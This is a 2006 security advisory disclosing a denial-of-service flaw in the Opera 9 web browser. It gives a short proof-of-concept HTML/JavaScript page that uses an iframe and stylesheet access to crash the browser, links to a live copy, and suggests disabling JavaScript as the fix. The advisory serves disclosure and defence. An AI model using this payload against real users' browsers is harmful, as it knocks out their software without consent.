ECHO_ADV_35$2006
------------------------------------------------------------------------
------------
[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service
------------------------------------------------------------------------
------------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : July, 1th 2006
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv35-y3dips-2006.txt
Critical Lvl : Moderated
Impact : Browser will automatically shutdown
Where : From Remote
------------------------------------------------------------------------
------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Opera Web Browser
Application : Opera Web Browser
version : Opera/9.00 (X11; Linux i686; U; en)
Opera/9.00 (Windows NT 5:1;U;en)
Some Other version are bot vulnerable and others are not tested,
URL : http://opera.com
Description :
Vulnerability can be exploited by using <iframe> combining with javascript
(documents stylesheet) to create an out-of-bounds memory access.
------------------------------------------------------------------------
------------
Exploit Code:
~~~~~~~~~~~~~~~~
-----------------------opera9xploit.html----------------------
<!-- Opera 9 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3d1ps.blogspot.com
//-->
<html>
<iframe src="palsu.php" name="fake" ></iframe>
<script type="text/javascript">
function mystyle() {
if (fake.document.styleSheets.length == 1 )
{
f = document.forms["basicstyle"].elements;
for (j = 0; j < f.length; j++)
{
if (f[j].name == 'fsmain');
}
}
}
mystyle();
</script>
</html>
live exploit :
http://y3dips.echo.or.id/opera9-dos/
------------------------------------------------------------------------
------------
Solution:
~~~~~~~~
Disable Java Scipt execution from Opera Web browser
------------------------------------------------------------------------
------------
Shoutz:
~~~~~~~
~ my beloved ana
~ the_day, K-159 (keep researching), also all echo staff
~ negative , naisenodni crew
~ janex vind "waraxe" @ waraxe.us
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] -------------------------------------------
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum